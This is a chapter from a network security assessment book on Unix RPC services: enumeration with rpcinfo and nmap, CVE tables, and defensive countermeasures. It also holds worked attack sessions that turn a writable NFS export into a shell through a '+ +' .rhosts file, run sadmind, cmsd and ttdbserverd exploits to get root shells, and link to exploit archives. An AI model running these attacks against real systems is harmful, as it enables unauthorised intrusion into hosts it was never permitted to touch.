Chapter 13. Assessing Unix RPC Services

Vulnerabilities in Unix RPC services have led to many large organizations falling victim to hackers over the last 10 years. One such incident in April 1999 resulted in the web sites of Playboy, Sprint, O’Reilly Media, Sony Music, Sun Microsystems, and others being mass-defaced by H4G1S and the Yorkshire Posse (HTML mirrored at http://www.2600.com/hackedphiles/current/oreilly/hacked/). In this chapter, I cover remote RPC service vulnerabilities in Solaris, IRIX, and Linux, exploring how these services are exploited in the wild and how you can protect them. In general, these services should not be presented to the public Internet and should be run only when absolutely necessary.

Enumerating Unix RPC Services

A number of interesting Unix daemons (including NIS+, NFS, and CDE components) run as Remote Procedure Call (RPC) services using dynamically assigned high ports. To keep track of registered endpoints and present clients with accurate details of listening RPC services, a portmapper service listens on TCP and UDP port 111, and sometimes on TCP and UDP port 32771 also.

The RPC portmapper (also known as rpcbind within Solaris) can be queried using the rpcinfo command found on most Unix-based platforms, as shown in Example 13-1.

Example 13-1. Using rpcinfo to list accessible RPC service endpoints
$ rpcinfo -p 192.168.0.50
program vers proto port  service
100000   4    tcp  111   rpcbind
100000   4    udp  111   rpcbind
100024   1    udp  32772 status
100024   1    tcp  32771 status
100021   4    udp  4045  nlockmgr
100021   2    tcp  4045  nlockmgr
100005   1    udp  32781 mountd
100005   1    tcp  32776 mountd
100003   2    udp  2049  nfs
100011   1    udp  32822 rquotad
100002   2    udp  32823 rusersd
100002   3    tcp  33180 rusersd

In this example, you can find the following:

  • status (rpc.statd) on TCP port 32771 and UDP port 32772

  • nlockmgr (rpc.lockd) on TCP and UDP port 4045

  • nfsd on UDP port 2049

  • rquotad on UDP port 32822

  • rusersd on TCP port 33180 and UDP port 32823

These services can be accessed and queried directly using client software, such as showmount and mount (to access nfsd and mountd), and rusers (to access rusersd, covered in Chapter 5).
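The wire exchange behind Example 13-1, as an added example that is not code from the book: a minimal ONC RPC client that encodes the portmapper DUMP call (program 100000, version 2, procedure 4), checks the reply header and decodes the mapping list, so you can inventory RPC exposure on your own hosts without rpcinfo. The reply bytes in sample_dump_reply are constructed, not captured traffic, and the host argument to rpcinfo_dump is whatever you choose to audit.

```python
import socket
import struct

PMAP_PROG, PMAP_VERS, PMAPPROC_DUMP = 100000, 2, 4  # portmapper program, version, DUMP procedure
IPPROTO = {6: "tcp", 17: "udp"}

def build_call(xid, prog, vers, proc):
    """Encode an ONC RPC v2 CALL with AUTH_NULL credential and verifier (RFC 1057)."""
    header = struct.pack(">IIIIII", xid, 0, 2, prog, vers, proc)  # msg_type 0 = CALL, rpcvers 2
    auth_null = struct.pack(">II", 0, 0)                          # flavor AUTH_NULL, zero-length body
    return header + auth_null + auth_null

def parse_reply(xid, data):
    """Check the reply header (REPLY, MSG_ACCEPTED, SUCCESS) and return the XDR result bytes."""
    rxid, msg_type, reply_stat = struct.unpack_from(">III", data, 0)
    if rxid != xid or msg_type != 1 or reply_stat != 0:
        raise ValueError("reply rejected or xid mismatch")
    verf_len = struct.unpack_from(">I", data, 16)[0]  # verifier = flavor, length, opaque body
    pos = 20 + ((verf_len + 3) & ~3)                  # XDR pads opaque data to a 4-byte boundary
    if struct.unpack_from(">I", data, pos)[0] != 0:   # accept_stat 0 = SUCCESS
        raise ValueError("procedure call not accepted")
    return data[pos + 4:]

def parse_dump(results):
    """Decode the PMAPPROC_DUMP list: repeated (1, prog, vers, prot, port) ended by a 0 word."""
    mappings, pos = [], 0
    while struct.unpack_from(">I", results, pos)[0] == 1:
        prog, vers, prot, port = struct.unpack_from(">IIII", results, pos + 4)
        mappings.append((prog, vers, IPPROTO.get(prot, str(prot)), port))
        pos += 20
    return mappings

def sample_dump_reply(xid):
    """Constructed reply (not captured traffic) advertising rpcbind and rpc.statd as in Example 13-1."""
    header = struct.pack(">IIIIII", xid, 1, 0, 0, 0, 0)  # REPLY, MSG_ACCEPTED, AUTH_NULL verifier, SUCCESS
    entries = struct.pack(">IIIII", 1, 100000, 4, 6, 111) + struct.pack(">IIIII", 1, 100024, 1, 17, 32772)
    return header + entries + struct.pack(">I", 0)

def rpcinfo_dump(host, timeout=5.0):
    """Query a remote portmapper over TCP/111 and list its registrations, like 'rpcinfo -p host'."""
    xid = 0x1337C0DE  # arbitrary transaction id; the reply must echo it
    call = build_call(xid, PMAP_PROG, PMAP_VERS, PMAPPROC_DUMP)
    with socket.create_connection((host, 111), timeout=timeout) as s:
        s.sendall(struct.pack(">I", 0x80000000 | len(call)) + call)  # record mark: last-fragment bit | length
        rd, data, last = s.makefile("rb"), b"", False
        while not last:  # reassemble TCP record fragments until the last-fragment bit is set
            mark = struct.unpack(">I", rd.read(4))[0]
            data += rd.read(mark & 0x7FFFFFFF)
            last = bool(mark & 0x80000000)
    return parse_dump(parse_reply(xid, data))

if __name__ == "__main__":
    for prog, vers, proto, port in parse_dump(parse_reply(0x42, sample_dump_reply(0x42))):
        print(f"{prog:<8}{vers:>4} {proto:>5} {port:>6}")
```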

Identifying RPC Services Without Portmapper Access

In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on Solaris hosts) to identify RPC services that are open to direct attack.

You can run Nmap with the -sR option to identify RPC services listening on high ports if the portmapper is inaccessible. Example 13-2 shows Nmap in use against a Solaris 9 host behind a firewall filtering the portmapper and services below port 1024.

Example 13-2. Using Nmap to find RPC services running on high ports
$ nmap -sR 10.0.0.9

Starting Nmap 4.10 ( http://www.insecure.org/nmap/ ) at 2007-04-01 20:39 UTC
Interesting ports on 10.0.0.9:
PORT      STATE SERVICE                        VERSION
4045/tcp  open  nlockmgr (nlockmgr V1-4)       1-4 (rpc #100021)
6000/tcp  open  X11
6112/tcp  open  dtspc
7100/tcp  open  font-service
32771/tcp open  ttdbserverd (ttdbserverd V1)   1 (rpc #100083)
32772/tcp open  kcms_server (kcms_server V1)   1 (rpc #100221)
32773/tcp open  metad (metad V1)               1 (rpc #100229)
32774/tcp open  metamhd (metamhd V1)           1 (rpc #100230)
32775/tcp open  rpc.metamedd (rpc.metamedd V1) 1 (rpc #100242)
32776/tcp open  rusersd (rusersd V2-3)         2-3 (rpc #100002)
32777/tcp open  status (status V1)             1 (rpc #100024)
32778/tcp open  sometimes-rpc19
32779/tcp open  sometimes-rpc21
32780/tcp open  dmispd (dmispd V1)             1 (rpc #300598)

Connecting to RPC Services Without Portmapper Access

If network access to the RPC portmapper service is filtered and you try to use an RPC client, such as showmount, it will fail, as shown here:

$ showmount -e 10.0.0.9
mount clntudp_create: RPC: Port mapper failure RPC: Unable to receive

The portmapper is required to orchestrate and manage the connection between the RPC client and service endpoint. To connect to remote RPC endpoints without an available portmapper using standard RPC clients, we must configure a local RPC portmapper and proxy the RPC endpoint connections through to the remote (target) server.

This technique is described by David Routin in his paper at http://www.milw0rm.com/papers/154, and it requires that the following utilities be installed and available on the local RPC attack proxy server:

  • netcat

  • inetd

  • portmap

  • pmap_set

RPC Service Vulnerabilities

Because of the number of different RPC services, associated prognum values, CVE references, and vulnerable platforms, it is impractical to discuss every bug individually. Instead, I have put together the matrix of popular services and vulnerable platforms shown in Table 13-1. A small number of obscure IRIX services (rpc.xfsmd, rpc.espd, etc.) aren’t listed; you can investigate them through MITRE CVE and other sources.

Table 13-1. Vulnerable RPC services, CVE references, and exploit framework support

Program number | Service     | CVE references
100000         | portmapper  | CVE-2007-0736, CVE-1999-190
100003         | nfsd        | CVE-1999-0832
100004         | ypserv      | CVE-2000-1043, CVE-2000-1042
100005         | mountd      | CVE-2005-0139, CVE-2003-0252, CVE-1999-0002
100007         | ypbind      | CVE-2001-1328, CVE-2000-1041
100008         | rwalld      | CVE-2002-0573
100009         | yppasswd    | CVE-2001-0779
100024         | statd       | CVE-2000-0666, CVE-1999-0493, CVE-1999-0019, CVE-1999-0018
100028         | ypupdated   | CVE-1999-0208
100068         | cmsd        | CVE-2002-1998, CVE-2002-0391, CVE-1999-0696, CVE-1999-0320
100083         | ttdbserverd | CVE-2002-0679, CVE-2002-0677, CVE-2002-0391, CVE-2001-0717, CVE-1999-0003
100099         | autofsd     | CVE-1999-0088
100232         | sadmind     | CVE-2003-0722, CVE-1999-0977
100235         | cachefsd    | CVE-2002-0033, CVE-2002-0084
100249         | snmpXdmid   | CVE-2001-0236
100300         | nisd        | CVE-1999-0795, CVE-1999-0008
150001         | pcnfsd      | CVE-1999-0078
300019         | amd         | CVE-1999-0704

Exploit framework support columns (IMPACT, CANVAS, MSF, LSD): the per-service marks in these four columns are not legible in this copy of the table.

Two sets of integer overflows were uncovered in 2002 and 2003 relating to XDR functions used in Solaris RPC services and associated components. These issues are listed in MITRE CVE as CVE-2003-0028 and CVE-2002-0391, and have multiple attack vectors, including cmsd, ttdbserverd, and dmispd.

The LSD column in Table 13-1 does not relate to an exploitation framework, but to the work of the Last Stage of Delirium (LSD) research team. LSD published reliable standalone exploits for the issues marked in Table 13-1, packaged in ZIP archives (solaris.zip and irix.zip) at http://lsd-pl.net/code/. These ZIP archives are also available from the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/.

Exploits for vulnerabilities that are not covered by CORE IMPACT, Immunity CANVAS, MSF, or LSD are listed in the following sections of this chapter.

Abusing NFS and rpc.mountd (100005)

Three serious remotely exploitable bugs have been identified in the mountd and nfsd service binaries that are bundled with older Linux distributions (primarily Red Hat and Debian). The MITRE CVE references for these bugs are CVE-2003-0252, CVE-1999-0832, and CVE-1999-0002. Many DoS issues exist in recent NFS implementations, which you can investigate by checking MITRE CVE (http://cve.mitre.org).

CVE-2003-0252

In July 2003, an off-by-one bug was identified in the xlog( ) function of the mountd service bundled with multiple Linux distributions (including Debian 8.0, Slackware 8.1, and Red Hat Linux 6.2) as part of the nfs-utils-1.0.3 package. An exploit script for this issue is available at http://www.newroot.de/projects/mounty.c.

CVE-1999-0832

A second remotely exploitable issue was identified in Red Hat Linux 5.2 and Debian 2.1 and earlier relating to the rpc.nfsd service (as part of the nfs-server-2.2beta46 package) in November 1999. An exploit script for this issue is available at http://examples.oreilly.com/networksa/tools/rpc_nfsd2.c.

CVE-1999-0002

In October 1998, a serious remotely exploitable vulnerability was found in the NFS mountd service bundled with Red Hat Linux 5.1 (as part of the nfs-server-2.2beta29 package). Other Linux distributions were also found to be vulnerable, along with IRIX. Exploit scripts for this issue are available at:

http://examples.oreilly.com/networksa/tools/ADMmountd.tgz
http://examples.oreilly.com/networksa/tools/rpc.mountd.c

Listing and accessing exported directories through mountd and NFS

If the mountd service is running, you can use the Unix showmount command to list exported directories on the target host. These directories can then be accessed and manipulated using the mount command and other NFS client utilities. In Example 13-3, I use showmount to query a Solaris 2.6 host at 10.0.0.6, mount a writable export, and gain remote access by writing a .rhosts file to a user’s home directory.

Example 13-3. Abusing writable NFS directories to gain direct host access
$ showmount -e 10.0.0.6
Export list for 10.0.0.6:
/home       (everyone)
/usr/local  onyx.trustmatta.com
/disk0      10.0.0.10,10.0.0.11
$ mount 10.0.0.6:/home /mnt
$ cd /mnt
$ ls -la
total 44
drwxr-x---  17 root      root    512 Jun 26 09:59 .
drwxr-xr-x   9 root      root    512 Oct 12 03:25 ..
drwx------   4 chris     users   512 Sep 20  2002 chris
drwxr-x---   4 david     users   512 Mar 12  2003 david
drwx------   3 chuck     users   512 Nov 20  2002 chuck
drwx--x--x   8 jarvis    users  1024 Oct 31 13:15 jarvis
$ cd jarvis
$ echo + + > .rhosts
$ cd /
$ umount /mnt
$ rsh -l jarvis 10.0.0.6 csh -i
Warning: no access to tty; thus no job control in this shell...
dockmaster%

Multiple Vendor rpc.statd (100024) Vulnerabilities

In recent years, four serious remotely exploitable bugs have been identified in the NFS status service (known as rpc.statd on most Unix-based platforms, and not to be confused with rpc.rstatd). These bugs are listed in Table 13-2, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.

Table 13-2. Recent rpc.statd vulnerabilities listed within MITRE CVE

CVE reference(s)                | Affected platforms                                       | Exploit scripts
CVE-2000-0666                   | Red Hat 6.2, Mandrake 7.1, and other Linux distributions | lsx.tgz, statdx2.tar.gz, and rpc-statd.c
CVE-1999-0493                   | Solaris 2.5.1                                            | statd.tar.gz
CVE-1999-0018 and CVE-1999-0019 | Solaris 2.4, IRIX, AIX, and HP-UX                        | dropstatd (Solaris binary)

Solaris rpc.sadmind (100232) Vulnerabilities

The Sun Solstice AdminSuite Daemon (sadmind) is enabled by default on Solaris 2.5.1 and later (up to Solaris 9 at the time of writing). sadmind has been found to be remotely vulnerable to two serious issues over recent years; they are known within MITRE CVE as CVE-1999-0977 and CVE-2003-0722.

CVE-1999-0977

The sadmind service running on Solaris 2.6 and 2.7 can be exploited by issuing a crafted RPC request, resulting in a stack overflow. Two exploits are effective at compromising vulnerable Solaris instances on Intel (x86) and SPARC architectures and are available at:

http://examples.oreilly.com/networksa/tools/super-sadmind.c
http://examples.oreilly.com/networksa/tools/sadmind-brute.c

CVE-2003-0722

A more recent bug, identified in September 2003, relates to authentication within sadmind. By default, the sadmind service runs in a weak security mode known as AUTH_SYS. When running in this mode, sadmind accepts command requests containing the user and group IDs, as well as the originating system name. Because these values aren’t validated by the sadmind service, you can gain access to a vulnerable system by sending a crafted RPC request. Because this bug doesn’t rely on memory manipulation, it can be exploited very easily to circumvent proactive mechanisms that may be in use, such as stack protection.

H D Moore wrote a Perl exploit script called rootdown.pl, available at http://www.metasploit.com/tools/rootdown.pl. This script has been integrated into MSF and can be run from the framework with ease.

Example 13-4 shows the rootdown.pl script in use against a Solaris 9 server at 10.0.0.9. By writing "+ +" into a user’s .rhosts file (the bin user in this case), you can easily gain access.

Example 13-4. Exploiting a Solaris 9 host with rootdown.pl
$ perl rootdown.pl -h 10.0.0.9 -i

sadmind> echo + + > /usr/bin/.rhosts
Success: your command has been executed successfully.

sadmind> exit

Exiting interactive mode...
$ rsh -l bin 10.0.0.9 csh -i
Warning: no access to tty; thus no job control in this shell...
onyx% uname -a
SunOS onyx 5.9 Generic_112234-08 i86pc i386 i86pc

Multiple Vendor rpc.cmsd (100068) Vulnerabilities

In recent years, four serious remotely exploitable bugs have been identified in the CDE Calendar Manager Service Daemon (CMSD), known as rpc.cmsd on most Unix-based platforms. These bugs are listed in Table 13-3, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.

Table 13-3. Recent rpc.cmsd vulnerabilities listed within MITRE CVE

CVE reference | Affected platforms                                          | Exploit scripts
CVE-2002-1998 | SCO UnixWare 7.1.1 and OpenUnix 8.0.0                       | unixware_cmsd.c
CVE-2002-0391 | Solaris 9 and other BSD-derived platforms                   | (Immunity CANVAS supports these exploits)
CVE-1999-0696 | Solaris 2.7, HP-UX 11.00, Tru64 4.0f, and SCO UnixWare 7.1.0 | lsd_cmsd.c and cmsd.tgz
CVE-1999-0320 | Solaris 2.5.1 and SunOS 4.1.4                               | N/A

Example 13-5 shows the usage of the compiled cmsd exploit (found in cmsd.tgz).

Example 13-5. cmsd exploit usage
$ ./cmsd
usage: cmsd [-s] [-h hostname] [-c command] [-u port] [-t port]
       version host

   -s: just start up rpc.cmsd (useful with a firewalled portmapper)
   -h: (for 2.6) specifies the hostname of the target
   -c: specifies an alternate command
   -u: specifies a port for the udp portion of the attack
   -t: specifies a port for the tcp portion of the attack

Available versions:
   1: Solaris 2.5.1 /usr/dt/bin/rpc.cmsd      338844 [2-5]
   2: Solaris 2.5.1 /usr/openwin/bin/rpc.cmsd 200284 [2-4]
   3: Solaris 2.5   /usr/openwin/bin/rpc.cmsd 271892 [2-4]
   4: Solaris 2.6   /usr/dt/bin/rpc.cmsd      347712 [2-5]
   5: Solaris 7     /usr/dt/bin/rpc.cmsd
   6: Solaris 7     /usr/dt/bin/rpc.cmsd (2)
   7: Solaris 7 (x86) .../dt/bin/rpc.cmsd     329080 [2-5]
   8: Solaris 2.6_x86 .../dt/bin/rpc.cmsd     318008 [2-5]

For the exploit to work, you must build an RPC request that includes the local hostname (also known as the RPC cache name) of the target server. Under Solaris, there are a number of services that give away the hostname, including FTP, as shown here:

$ ftp 10.0.0.6
Connected to 10.0.0.6.
220 dockmaster FTP server (SunOS 5.6) ready.
Name (10.0.0.6:root):

After obtaining both the hostname and version of Solaris running on the target host, you can launch the cmsd exploit. If no command is specified, the tool binds /bin/sh to TCP port 1524, as shown in Example 13-6.

Example 13-6. Executing the rpc.cmsd overflow and gaining access
$ ./cmsd -h dockmaster 4 10.0.0.6
rtable_create worked
clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection
reset by peer
$ telnet 10.0.0.6 1524
Trying 10.0.0.6...
Connected to 10.0.0.6.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)

Multiple Vendor rpc.ttdbserverd (100083) Vulnerabilities

In recent years, four serious remotely exploitable bugs have been identified in the ToolTalk Database (TTDB) service, known as rpc.ttdbserverd on most Unix-based platforms. These bugs are listed in Table 13-4, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.

Table 13-4. Recent rpc.ttdbserverd vulnerabilities listed within MITRE CVE

CVE reference | Affected platforms                                                                     | Exploit scripts
CVE-2002-0679 | Solaris 9, HP-UX 11.11, Tru64 5.1A, AIX 5.1, SCO UnixWare 7.1.1, and OpenUnix 8.0.0    | N/A
CVE-2002-0677 | Solaris 9, HP-UX 11.11, Tru64 5.1A, AIX 5.1, SCO UnixWare 7.1.1, and OpenUnix 8.0.0    | N/A
CVE-2002-0391 | Solaris 9 and other BSD-derived platforms                                              | (Immunity CANVAS and CORE IMPACT support these exploits)
CVE-2001-0717 | Solaris 8, HP-UX 11.11, Tru64 5.1A, AIX 5.1, and IRIX 6.4                              | N/A
CVE-1999-0003 | Solaris 2.6, HP-UX 11.0, and IRIX 6.5.2                                                | lsd_irix_ttdb.c and lsd_sol_ttdb.c

Example 13-7 shows the LSD TTDB exploit in use against a Solaris 2.6 host at 10.0.0.6.

Example 13-7. The LSD Solaris rpc.ttdbserverd exploit in use
$ ./lsd_sol_ttdb
copyright LAST STAGE OF DELIRIUM jul 1998 poland  //lsd-pl.net/
rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc

usage: ./lsd_solttdb address [-s|-c command] [-p port] [-v 6]

$ ./lsd_sol_ttdb 10.0.0.6 -v 6
copyright LAST STAGE OF DELIRIUM jul 1998 poland  //lsd-pl.net/
rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc

adr=0xeffffaf8 timeout=10 port=32785 connected! sent!
SunOS dockmaster 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10
id
uid=0(root) gid=0(root)

Unix RPC Services Countermeasures

The following countermeasures should be considered when hardening RPC services:

  • Don’t run rexd, rusersd, or rwalld RPC services because they are of minimal use and provide attackers with both useful information and direct access to your hosts.

  • In high-security environments, don’t offer any RPC services to the public Internet. Due to the complexity of these services, it is highly likely that zero-day exploit scripts will be available to attackers. RPC services should be filtered and disabled wherever possible, and should only be run where absolutely necessary.

  • To minimize the risk of internal or trusted attacks against necessary RPC services (such as NFS components, including statd, lockd, and mountd), install the latest vendor security patches.

  • Aggressively filter egress traffic, where possible, to ensure that even if an attack against an RPC service is successful, a connect-back shell can’t be spawned to the attacker.
